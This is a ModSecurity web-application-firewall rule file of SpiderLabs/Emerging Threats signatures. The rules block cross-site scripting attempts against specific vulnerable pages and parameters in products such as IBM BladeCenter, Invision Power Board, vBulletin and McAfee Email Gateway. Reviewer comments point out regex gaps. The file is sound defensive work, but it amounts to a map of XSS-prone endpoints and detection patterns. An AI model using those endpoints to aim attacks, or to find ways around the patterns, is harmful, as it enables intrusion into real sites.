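SecRule &TX:'/XSS.*ARGS:BaseTarget/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2010980) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM ENOVIA SmarTeam v5 LoginPage.aspx Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /WebEditor/Authentication/LoginPage.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010980,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM ENOVIA SmarTeam v5 LoginPage.aspx Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:errMsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM ENOVIA SmarTeam v5 LoginPage.aspx Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011190) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module cindefn.php Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /private/cindefn.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011190,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module cindefn.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:INDEX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module cindefn.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_management_policy_options.php Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /private/power_management_policy_options.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011191,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_management_policy_options.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:domain/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_management_policy_options.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011192) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module pm_temp.php Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /private/pm_temp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011192,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module pm_temp.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:slot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module pm_temp.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_module.php Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /private/power_module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011193,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_module.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:slot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module power_module.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module blade_leds.php Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /private/blade_leds.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011194,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module blade_leds.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:WEBINDEX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module blade_leds.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011195) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module ipmi_bladestatus.php Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /private/ipmi_bladestatus.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011195,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module ipmi_bladestatus.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:SLOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module ipmi_bladestatus.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004576) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_bbcodeloader.php
# Chained tests corrected from the literal "| 3C |" / "| 3E |" strings (see the notes at the top of this block).
SecRule REQUEST_LINE "@contains /module_bbcodeloader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004576,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_bbcodeloader.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'"
SecRule REQUEST_LINE "@contains <" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode"
SecRule REQUEST_LINE "@contains script" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_LINE "@contains >" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_bbcodeloader.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004577) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_div.php
# Chained tests corrected from the literal "| 3C |" / "| 3E |" strings (see the notes at the top of this block).
SecRule REQUEST_LINE "@contains /module_div.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004577,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_div.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'"
SecRule REQUEST_LINE "@contains <" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode"
SecRule REQUEST_LINE "@contains script" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_LINE "@contains >" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_div.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004578) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_email.php
# Chained tests corrected from the literal "| 3C |" / "| 3E |" strings (see the notes at the top of this block).
SecRule REQUEST_LINE "@contains /module_email.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004578,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_email.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'"
SecRule REQUEST_LINE "@contains <" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode"
SecRule REQUEST_LINE "@contains script" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_LINE "@contains >" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_email.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004579) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_image.php
# Chained tests corrected from the literal "| 3C |" / "| 3E |" strings (see the notes at the top of this block).
SecRule REQUEST_LINE "@contains /module_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004579,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_image.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'"
SecRule REQUEST_LINE "@contains <" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode"
SecRule REQUEST_LINE "@contains script" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_LINE "@contains >" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_image.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004580) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_link.php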
SecRule REQUEST_LINE "@contains /module_link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004580,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_link.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_link.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004581) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_table.php editorid SecRule REQUEST_LINE "@contains /jscripts/folder_rte_files/module_table.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004581,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_table.php editorid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule &TX:'/XSS.*ARGS:editorid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_table.php editorid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004592) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin XSS Attempt -- calendar.php SecRule REQUEST_LINE "@contains /calendar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004592,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin XSS Attempt -- calendar.php',tag:'web-application-attack',tag:'url,www.vbulletin.com/forum/showthread.php?postid=1355012'" 
SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin XSS Attempt -- calendar.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS XSS Attempt -- index.php login SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004572,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS XSS Attempt -- index.php login',tag:'web-application-attack',tag:'url,www.osvdb.org/34791'" SecRule &TX:'/XSS.*ARGS:login/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS XSS Attempt -- index.php login',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003913) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kayako eSupport XSS Attempt -- index.php _m SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003913,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kayako eSupport XSS Attempt -- index.php _m',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467832/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:_m/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kayako eSupport XSS Attempt -- index.php _m',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM Lotus Connections simpleSearch.do Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains 
/profiles/html/simpleSearch.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009990,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM Lotus Connections simpleSearch.do Cross-Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securitytracker.com/alerts/2009/Sep/1022945.html'" SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM Lotus Connections simpleSearch.do Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003918) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- sendmail.php SecRule REQUEST_LINE "@contains /sendmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003918,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- sendmail.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23847'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- sendmail.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003919) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- order_form.php SecRule REQUEST_LINE "@contains /order_form.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003919,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- 
order_form.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23847'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- order_form.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- configure_plugin.tpl.php edit_plugin SecRule REQUEST_LINE "@contains /configure_plugin.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- configure_plugin.tpl.php edit_plugin',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23917'" SecRule &TX:'/XSS.*ARGS:edit_plugin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- configure_plugin.tpl.php edit_plugin',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003883) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php 1 SecRule REQUEST_LINE "@contains /web/phpinfo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003883,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php 1',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23917'" SecRule REQUEST_LINE "@contains 1[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) 
XSS Attempt -- phpinfo.php 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003884) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php a
# NOTE(review): in the last link, "<.+\/script" needs at least one character
# between "<" and "/script", so a plain "</script>" closing tag does not satisfy
# the regex; confirm against the upstream signature. The decode transformations
# are declared on the first link only; confirm they apply to this link as well.
# "@contains a[" is a literal substring test on the whole request line.
SecRule REQUEST_LINE "@contains /web/phpinfo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003884,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php a',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23917'"
SecRule REQUEST_LINE "@contains a[" "chain"
SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php a',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011082) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS McAfee Email Gateway queueMsgType Parameter Cross Site Scripting Attempt
# NOTE(review): &TX:'/XSS.*ARGS:queueMsgType/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "queueMsgType" are counted too.
# The middle link requires the literal "method=getQueueMessages&", i.e. the
# method parameter must be followed by another parameter for the chain to match.
SecRule REQUEST_LINE "@contains /admin/queuedMessage.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011082,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS McAfee Email Gateway queueMsgType Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains method=getQueueMessages&" "chain"
SecRule &TX:'/XSS.*ARGS:queueMsgType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS McAfee Email Gateway queueMsgType Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011083) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS McAfee Email Gateway QtnType Parameter Cross Site 
Scripting Attempt
# NOTE(review): &TX:'/XSS.*ARGS:QtnType/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "QtnType" are counted too.
SecRule REQUEST_LINE "@contains /admin/queuedMessage.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011083,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS McAfee Email Gateway QtnType Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains method=getQueueMessages&" "chain"
SecRule &TX:'/XSS.*ARGS:QtnType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS McAfee Email Gateway QtnType Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003894) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- dev_logon.asp username
# NOTE(review): same unanchored TX-name count as above, here for "username".
SecRule REQUEST_LINE "@contains /de/pda/dev_logon.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003894,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- dev_logon.asp username',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468048/100/0/threaded'"
SecRule &TX:'/XSS.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- dev_logon.asp username',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003895) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- registerAccount.asp
SecRule REQUEST_LINE "@contains /usrmgr/registerAccount.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003895,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- 
registerAccount.asp',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468048/100/0/threaded'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- registerAccount.asp',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003896) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- create_account.asp
# NOTE(review): in the last link, "<.+\/script" needs at least one character
# between "<" and "/script", so a plain "</script>" closing tag does not satisfy
# the regex; confirm against the upstream signature. The decode transformations
# are declared on the first link only; confirm they apply to this link as well.
SecRule REQUEST_LINE "@contains /de/create_account.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003896,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- create_account.asp',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468048/100/0/threaded'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- create_account.asp',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2010031) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Novell eDirectory 'dconserv.dlm' Cross-Site Scripting Attempt
SecRule REQUEST_LINE "@contains /dhost/modules" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010031,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Novell eDirectory \'dconserv.dlm\' Cross-Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36567/info'"
SecRule &TX:'/XSS.*ARGS:dconserv.dlm/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Novell eDirectory \'dconserv.dlm\' Cross-Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Translation Engine (OTE) XSS Attempt -- header.php ote_home
